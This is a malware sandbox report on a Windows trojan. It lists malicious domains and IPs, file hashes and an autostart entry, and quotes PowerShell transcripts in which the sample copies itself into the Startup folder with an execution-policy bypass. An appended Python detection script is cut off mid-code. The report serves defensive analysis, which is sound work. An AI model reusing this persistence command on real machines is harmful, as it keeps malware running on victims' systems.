                      URLs

                      Source | Detection | Scanner | Label
                      http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      http://crl.microsoft.co | 0% | Avira URL Cloud | safe
                      https://pNaYvIZ26OfWPs.net | 0% | Avira URL Cloud | safe
                      http://nobettwo.xyz | 0% | Avira URL Cloud | safe
                      https://contoso.com/ | 0% | URL Reputation | safe
                      https://contoso.com/ | 0% | URL Reputation | safe
                      https://contoso.com/ | 0% | URL Reputation | safe
                      https://contoso.com/License | 0% | URL Reputation | safe
                      https://contoso.com/License | 0% | URL Reputation | safe
                      https://contoso.com/License | 0% | URL Reputation | safe
                      https://contoso.com/Icon | 0% | URL Reputation | safe
                      https://contoso.com/Icon | 0% | URL Reputation | safe
                      https://contoso.com/Icon | 0% | URL Reputation | safe
                      http://oVNzXy.com | 0% | Avira URL Cloud | safe
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                      https://api.ipify.org% | 0% | URL Reputation | safe
                      https://api.ipify.org% | 0% | URL Reputation | safe
                      https://api.ipify.org% | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      nobettwo.xyz | 198.54.126.101 | true | true | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | false | (none) | high
http://DynDns.comDynDNS | Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | false | (none) | high
http://crl.microsoft.co | powershell.exe, 00000002.00000002.277720910.00000000076B0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://pNaYvIZ26OfWPs.net | NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://nobettwo.xyz | NKPhba0VZI.exe, 00000005.00000002.478647044.0000000002F04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | false | (none) | high
https://contoso.com/License | powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://contoso.com/Icon | powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://oVNzXy.com | Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | low
http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/ | NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.267966815.0000000004531000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.371748819.0000000004C81000.00000004.00000001.sdmp | false | (none) | high
https://api.ipify.org% | NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | NKPhba0VZI.exe, 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | false | (none) | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.126.101 | unknown | United States | 22612 | NAMECHEAP-NETUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358333
Start date: 25.02.2021
Start time: 12:24:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NKPhba0VZI.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@12/12@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 0.1% (good quality ratio 0.1%)
• Quality average: 58.1%
• Quality standard deviation: 31.9%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 104.42.151.234, 168.61.161.212, 13.107.42.23, 13.107.5.88, 23.218.208.56, 51.11.168.160, 8.253.204.120, 67.27.158.126, 8.248.145.254, 8.248.119.254, 67.27.159.126, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.139.180
• Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/358333/sample/NKPhba0VZI.exe

Simulations

Behavior and APIs

Time | Type | Description
12:25:37 | API Interceptor | 710x Sleep call for process: NKPhba0VZI.exe modified
12:25:41 | API Interceptor | 64x Sleep call for process: powershell.exe modified
12:25:45 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
12:26:13 | API Interceptor | 478x Sleep call for process: Drivers.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
198.54.126.101 | http://tycoontribe.com/oned/sharepoint-v9/index.php | malicious | tycoontribe.com/wp-content/uploads/2019/09/TTbackgnd.jpg

Domains

Match | Associated Sample Name / URL | Detection | Context
nobettwo.xyz | RF_IMG_7510.doc | malicious | 198.54.126.101

ASN

Match | Associated Sample Name / URL | Detection | Context
NAMECHEAP-NETUS | RF_IMG_7510.doc | malicious | 198.54.126.101
NAMECHEAP-NETUS | PDA BGX00001A DA Query Notification BGX009RE09000001A.xlsx | malicious | 198.54.121.237
NAMECHEAP-NETUS | Shipping_Documet.xlsx | malicious | 198.54.112.233
NAMECHEAP-NETUS | QUOTATION.xlsx | malicious | 198.54.121.237
NAMECHEAP-NETUS | QUOTATION.xlsx | malicious | 198.54.121.237
NAMECHEAP-NETUS | OFFER.exe | malicious | 198.54.122.60
NAMECHEAP-NETUS | RPQ_1037910.exe | malicious | 162.213.253.52
NAMECHEAP-NETUS | KQ8FEB2021.exe | malicious | 162.213.253.54
NAMECHEAP-NETUS | y1dGqCeJXQ.exe | malicious | 162.213.253.54
NAMECHEAP-NETUS | Scan #84462.xlsm | malicious | 63.250.38.58
NAMECHEAP-NETUS | Invoice_#_6774.xlsm | malicious | 63.250.38.58
NAMECHEAP-NETUS | Invoice_#_6774.xlsm | malicious | 63.250.38.58
NAMECHEAP-NETUS | Notice 698.xlsm | malicious | 63.250.38.58
NAMECHEAP-NETUS | 7ufnEJRkxE.exe | malicious | 199.193.7.228
NAMECHEAP-NETUS | pHmpCUO2W2.exe | malicious | 199.193.7.228
NAMECHEAP-NETUS | Price quotation.exe | malicious | 198.54.125.81
NAMECHEAP-NETUS | 267700.xlsx | malicious | 198.54.121.237
NAMECHEAP-NETUS | 267700.xlsx | malicious | 198.54.121.237
NAMECHEAP-NETUS | shipping document.doc | malicious | 199.193.7.228
NAMECHEAP-NETUS | SecuriteInfo.com.W32.MSIL_Kryptik.COP.genEldorado.31763.exe | malicious | 198.54.122.60

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | RF_IMG_7510.doc | malicious | (none)

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Drivers.exe.log
Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 706
Entropy (8bit): 5.342604339328228
Encrypted: false
SSDEEP: 12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21q1KDLI4M9XKbbDLI4MWuPJKiUrRZ9I0ZKm:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9px
MD5: 3A72FBECA73A61C00EECBDEC37EAD411
SHA1: E2330F7B3182A857BB477B2492DDECC2A8488211
SHA-256: 2D4310C4AB9ADEFD6169137CD8973D23D779EDD968B8B39DBC072BF888D0802C
SHA-512: 260EBFB3045513A0BA14751A6B67C95CDA83DD122DC8510EF89C9C42C19F076C8C40645E0795C15ADDF57DB65513DD73EB3C5D0C883C6FB1C34165BE35AE3889
Malicious: false
Reputation: moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NKPhba0VZI.exe.log
Process: C:\Users\user\Desktop\NKPhba0VZI.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 706
Entropy (8bit): 5.342604339328228
Encrypted: false
SSDEEP: 12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21q1KDLI4M9XKbbDLI4MWuPJKiUrRZ9I0ZKm:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9px
MD5: 3A72FBECA73A61C00EECBDEC37EAD411
SHA1: E2330F7B3182A857BB477B2492DDECC2A8488211
SHA-256: 2D4310C4AB9ADEFD6169137CD8973D23D779EDD968B8B39DBC072BF888D0802C
SHA-512: 260EBFB3045513A0BA14751A6B67C95CDA83DD122DC8510EF89C9C42C19F076C8C40645E0795C15ADDF57DB65513DD73EB3C5D0C883C6FB1C34165BE35AE3889
Malicious: true
Reputation: moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 19604
Entropy (8bit): 5.5732578371132115
Encrypted: false
SSDEEP: 384:9typXbq0FfVeOy0MSg5l4KnLul9tHdpaeQ99gtCcQQpPTDkiqWJI5jQ:kfVaZSgX4KLul7H3at80RAozWJt
MD5: E47E850408CFEC13093B384E274EA249
SHA1: ABD257A58EB6B5E6D9A1B4BA816DF75CFA852CCD
SHA-256: 45B758B05B461164070A22FC3531EC92EB40C66C1B58A02875C56F1C9043A4D8
SHA-512: CCD37B07333AFE93E6642A366B82C7EA6FD320F0778D41B73C7E5D4737EFAC57452461C813B51041EE1EC3A90B796A50AE7412D5E825BFDE1B5FAA1D4A2B1BC0
Malicious: false
Reputation: low
                                      Preview: @...e.......................F.6.6.....n.>............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnmp4ebp.syx.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1rqppmh.xce.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5urz4n2.cbm.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwlodmhm.as4.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 620032
Entropy (8bit): 7.223416647299071
Encrypted: false
SSDEEP: 12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
MD5: 3A89CF2D6D2449EF1A9640AF29F3A782
SHA1: 220B9C5B4C7E9DE15753F629DA1AC3A075DC0800
SHA-256: 3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
SHA-512: 8B016C645C5CC5874F9FBD9539846CC74A07BA33DB75E11D0FD80EEEC8D0DCAE081B7B4A4090B5F806A2CE38BD8EACA859E15962441C691FD42995AE7FF9F974
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:
• Filename: RF_IMG_7510.doc, Detection: malicious
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............t..............@..B........................H.......t................-..Vf..........................................6.~....(#...&*6.r...p(?...&*..*....oe...}......of...}......}....*.(....r...p(.........~....~....op...oq..........*B.(r......(.....*.(}........*".(.....*&.(r.....*".......*".(.....*Vs....(....t..... ...*...0............}.....(.......(......{....r...po......{.....o.......}.....s....}......(....r...p(....}.....{....(....&..{....(.....i}.....(.....*..0..c.........{.........,f...s....}.....{.....o.......}.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe:Zone.Identifier
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210225\PowerShell_transcript.376483.hZkrHILO.20210225122601.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 3909
Entropy (8bit): 5.3554317034757455
Encrypted: false
SSDEEP: 96:BZohxN1GcqDo1Z0G9ZhnhxN1GcqDo1Z3V5xazDazDWzFZZ:v
MD5: 75CF527A9A62A1535AF090EAB85D3B13
SHA1: A28F4E2601C912DB36BC61D191B97D09C2DCD932
SHA-256: B3E6EB4BA0FB020B015CD20C39ABEA0575DD71EEB4CA619D7E4D4ADE3F5B4771
SHA-512: 73D305A077B265147B2D129D2A821F3E866126CCAD96EB36B81DE1B4DCE7929FB3F1B717EFBD3D589CA1BE497CE11F98467AB802FBDB172642C4B5DD5125D7B1
Malicious: false
                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225122618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 376483 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..Process ID: 6716..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225122618..**********************..PS>Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roam
                                      C:\Users\user\Documents\20210225\PowerShell_transcript.376483.uDG1lXLj.20210225122519.txt
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1175
                                      Entropy (8bit):5.240245547006109
                                      Encrypted:false
                                      SSDEEP:24:BxSAAyxvBnxx2DOXCg8GHuVM5fWStHjeTKKjX4CIym1ZJX0GHuVM5jnxSAZp:BZNvhxoOpuA+StqDYB1ZTuAjZZp
                                      MD5:46A2861BB28560404EB6E971178C990C
                                      SHA1:483341174306970C6E5AEB9BE69DC3913C0DE0FA
                                      SHA-256:E8C880B7ED410EE403654BFB489D5134666E03626B97473D27131427473B97F1
                                      SHA-512:F7A4148FE9EBC2AB6A2DC31DEC2B53EDBDA84BEAD745648FDC16B33B38CD2845A0C1DF42741A52B2DADCF7E8148A50CE4AF6E0F4FA70322B4226362B54D5034F
                                      Malicious:false
                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225122534..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 376483 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..Process ID: 2576..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225122534..**********************..PS>Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..**********************..Command start
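
The two transcripts above record the persistence step: powershell.exe launched with -ExecutionPolicy Bypass to Copy-Item the sample into the per-user Startup folder as Drivers.exe, and a second run in which the copy in Startup copies itself onto itself. As an added example (not Joe Sandbox code, and not part of the report), the script below parses PowerShell transcript files of this shape and flags that pattern. The two transcript strings are reconstructed from the report's previews with CRLF restored and the truncated tails omitted; the regular expressions and the Finding fields are the example's own choices.

```python
"""Detect Startup-folder persistence by parsing the PowerShell transcript
files a sample leaves behind (PowerShell_transcript.*.txt).

Added example, not Joe Sandbox code. The two transcripts are reconstructed
from this report's previews ('..' restored to CRLF, truncated tails omitted).
"""
import re
from dataclasses import dataclass

STARTUP_DIR_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
COPY_ITEM_RE = re.compile(r"Copy-Item\s+'([^']+)'\s+(?:-Destination\s+)?'([^']+)'", re.I)
BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I)

# First transcript the sample produced (PID 2576): original binary copied into Startup.
TRANSCRIPT_FIRST = "\r\n".join([
    "**********************",
    "Windows PowerShell transcript start",
    "Start time: 20210225122534",
    r"Username: computer\user",
    r"RunAs User: computer\user",
    "Configuration Name: ",
    "Machine: 376483 (Microsoft Windows NT 10.0.17134.0)",
    r"Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item "
    r"'C:\Users\user\Desktop\NKPhba0VZI.exe' "
    r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'",
    "Process ID: 2576",
    "PSVersion: 5.1.17134.1",
    "**********************",
])
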